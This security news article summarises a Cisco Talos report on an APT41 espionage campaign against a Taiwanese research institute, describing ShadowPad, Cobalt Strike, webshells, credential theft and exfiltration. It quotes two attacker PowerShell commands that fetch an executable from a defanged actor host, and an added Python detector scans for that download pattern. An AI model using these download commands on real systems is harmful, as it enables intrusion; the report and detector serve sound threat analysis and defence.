Cisco Talos has unearthed a sophisticated cyber-espionage campaign targeting a Taiwanese government-affiliated research institute.
The attack, attributed to the notorious Chinese hacking group APT41, involved the deployment of the ShadowPad malware and Cobalt Strike, among other customized tools.
This article delves into the specifics of the attack, the methodologies employed by the hackers, and the implications for cybersecurity.
The Attack Unveiled
Initial Compromise
The malicious campaign began as early as July 2023 and was first detected in August 2023 when Cisco Talos identified abnormal PowerShell commands connecting to an IP address to download and execute scripts.
The victim, a research institute specializing in computing and associated technologies, became a prime target due to the sensitive nature of its work.
Tactics, Techniques, and Procedures (TTPs)
The attack leveraged a combination of malware, open-source tools, and sophisticated procedures.
The ShadowPad malware used in this campaign abused an outdated Microsoft Office IME binary as a sideloading host to launch its payload.
The attackers also built a tailored loader that injected a proof-of-concept exploit for CVE-2018-0824, a remote code execution vulnerability repurposed here for local privilege escalation.
Attribution to APT41
Evidence and Assessment
Cisco Talos assesses with medium confidence that the campaign was orchestrated by APT41, a group alleged by the U.S. government to consist of Chinese nationals.
This assessment is based on overlaps in TTPs, infrastructure, and malware families used exclusively by Chinese APT groups.
ShadowPad, a modular remote access trojan (RAT) used in this attack, is widely considered the successor of PlugX and is known to be sold to Chinese hacking groups, including APT41.
Historical Context
APT41, believed to be based out of Chengdu, China, has a history of targeting entities of strategic interest. Its activity has been reported across various campaigns, including ones attributed to other Chinese hacking groups such as Mustang Panda and the Tonto Team.
The current campaign exhibited similarities with previous attacks, such as using identical loading mechanisms, infection chains, and file names.
Technical Analysis
Malware Deployment
Upon gaining access to the network, the attackers established a foothold by executing malicious code and binaries. They installed a webshell on the machine with the web server, enabling further discovery and execution.
The attackers deployed ShadowPad and Cobalt Strike using three different approaches: webshell, RDP access, and reverse shell.
PowerShell Commands
The attackers initially used PowerShell commands to download and execute additional scripts.
powershell (new-object System.Net.WebClient).DownloadFile('https://www.nss.com[.]tw/calc.exe','C:/users/public/calc.exe');"
powershell (new-object System.Net.WebClient).DownloadFile('https://www.nss.com[.]tw/calc.exe','C:/users/public/calc2.exe'); "
Despite detection and interruption, they persisted by using other PowerShell commands to download Cobalt Strike malware from a compromised C2 server.
The Cobalt Strike loader, written in GoLang, was designed to evade detection by Windows Defender.
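The following is an added detection example, not code from the Talos report: it scans process-creation command lines (for instance from Sysmon Event ID 1 or Windows Security event 4688) for the PowerShell WebClient.DownloadFile pattern quoted above and flags writes of executables into the world-writable C:\Users\Public staging directory. The sample command lines are constructed for this example; the two download commands are the ones quoted above, with the report's defanged hostname kept as-is.

```python
import re
from dataclasses import dataclass

# Constructed sample of process command lines. Lines 1-2 are the commands quoted
# above; lines 3-4 are benign filler written for this example.
SAMPLE_CMDLINES = [
    "powershell (new-object System.Net.WebClient).DownloadFile('https://www.nss.com[.]tw/calc.exe','C:/users/public/calc.exe');",
    "powershell (new-object System.Net.WebClient).DownloadFile('https://www.nss.com[.]tw/calc.exe','C:/users/public/calc2.exe');",
    "powershell -NoProfile -Command Get-Process | Where-Object CPU -gt 100",
    "powershell (New-Object System.Net.WebClient).DownloadFile('https://updates.example.test/config.xml','C:\\ProgramData\\Vendor\\config.xml')",
]

# Matches WebClient.DownloadFile(<url>, <dest>) regardless of case and spacing.
DOWNLOAD_RE = re.compile(
    r"system\.net\.webclient\)\s*\.\s*downloadfile\s*\(\s*['\"](?P<url>[^'\"]+)['\"]"
    r"\s*,\s*['\"](?P<dest>[^'\"]+)['\"]",
    re.IGNORECASE,
)
# C:\Users\Public (either slash style), the staging directory used in this campaign.
PUBLIC_DIR_RE = re.compile(r"^[a-z]:[\\/]+users[\\/]+public[\\/]", re.IGNORECASE)
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".vbs", ".scr")


@dataclass
class Finding:
    url: str
    dest: str
    reasons: tuple
    severity: str


def analyze_cmdline(cmdline):
    """Return a Finding for any PowerShell WebClient download, or None if absent.
    Severity is 'high' when the destination is a public staging directory or an
    executable, 'low' for other downloads that still deserve a look."""
    m = DOWNLOAD_RE.search(cmdline)
    if not m:
        return None
    url, dest = m.group("url"), m.group("dest")
    reasons = []
    if PUBLIC_DIR_RE.match(dest):
        reasons.append("writes to C:\\Users\\Public")
    if dest.lower().endswith(EXEC_EXT):
        reasons.append("executable payload")
    return Finding(url, dest, tuple(reasons), "high" if reasons else "low")


def scan(cmdlines):
    """Run analyze_cmdline over a batch of command lines, dropping non-matches."""
    return [f for f in (analyze_cmdline(c) for c in cmdlines) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f.severity.upper(), f.dest, f.reasons)
```

In a real deployment the destination check would be extended to other writable staging paths and joined with the subsequent execution of the downloaded file.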
Information Gathering and Exfiltration
Credential Harvesting
The threat actors harvested passwords from the compromised environment using tools like Mimikatz and WebBrowserPassView. They executed several commands to obtain information on user accounts, directory structure, and network configurations.
Additionally, ShadowPad performed lightweight network scanning to discover other machines in the compromised network.
Data Exfiltration
To exfiltrate a large number of files, the attackers used 7-Zip to compress and encrypt them into a single archive, then used their backdoors to send the archive to the command and control (C2) server.
ShadowPad Loader
The investigation revealed two distinct iterations of the ShadowPad loader, utilizing the same sideloading technique but exploiting different vulnerable binaries.
The initial variant targeted an outdated Microsoft Office IME binary version, while the more recent variant used a different legitimate binary to launch the malware.
Cobalt Strike Loader
A unique Cobalt Strike loader, developed in GoLang, was also detected. It was designed to avoid antivirus detection.
The loader was hidden in a picture using steganography, and its download, decryption, and execution routines occurred in runtime memory.
The APT41 attack on the Taiwanese research institute underscores the persistent and evolving threat posed by state-sponsored hacking groups.
Advanced malware like ShadowPad and Cobalt Strike, combined with sophisticated TTPs, highlights the need for robust cybersecurity measures.
As cyber-espionage campaigns target critical research and development entities, organizations must remain vigilant and proactive in their defense strategies.